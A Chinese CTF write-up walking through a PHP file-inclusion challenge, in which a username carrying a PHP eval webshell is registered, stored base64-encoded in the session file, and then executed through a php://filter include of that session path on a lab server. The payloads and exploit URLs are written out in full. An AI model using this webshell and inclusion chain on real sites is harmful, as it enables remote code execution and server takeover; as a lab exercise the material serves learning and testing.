文件包含漏洞之包含SESSION(CTF题目)

这次使用的环境是ubuntu+nginx+php+mysql

首先四个文件源码在以下链接中:

一道CTF题:PHP文件包含 | Chybeta

我们注册一个用户名111密码111,然后登录查看cookie和linux的session,因为我们的de服务器

是手动搭建的,所以容易知道session的位置。

我们查看这个session:

复制代码
cd /var/lib/php/sessions

发现我们的用户名以base64编码的格式放在了session中,因此我们只要把含有木马的用户名注册了,这个木马就会以base64编码的格式放在session中,并且路径我们也是知道的。

我们把一句话木马注册,可以看到木马已经被放进数据库里面了,session中也存在

15

复制代码
192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_hej7e9k4vjusbpumknkvsks5f1

但是上面的payload不能执行,因为session中还包含着15位的前缀,需要让其乱码

需要重新注册一个base64编码后的名字长度大于100的

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>

重复上述步骤

注册这个用户名:

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>
复制代码
http://192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_bhbl2nhonauub8vko76g2ublkt&atebyhc=phpinfo();

成功!

相关推荐
CertiK18 分钟前
CertiK创始人顾荣辉出席Unchained Summit,探讨Web3.0安全与合规路径
安全·web3
hunzi_18 小时前
筑牢数字防线:商城系统安全的多维守护策略
安全·系统安全
群联云防护小杜8 小时前
云服务器主动防御策略与自动化防护(下)
运维·服务器·分布式·安全·自动化·音视频
视觉&物联智能9 小时前
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
网络·人工智能·web安全·网络安全·安全威胁分析
博睿谷IT99_9 小时前
网络安全怎么入门?快速了解
安全·web安全
学习溢出10 小时前
【网络安全】网络钓鱼的类型
网络·安全·网络安全·网络钓鱼·社会工程
fmingzh11 小时前
NVIDIA高级辅助驾驶安全与技术读后感
人工智能·安全·自动驾驶
Blossom.11812 小时前
量子网络:构建未来通信的超高速“高速公路”
网络·opencv·算法·安全·机器学习·密码学·量子计算
落——枫12 小时前
网络安全知识点3
安全·web安全
柴郡猫^O^13 小时前
OSCP - Proving Grounds - Wpwn
安全·网络安全·安全性测试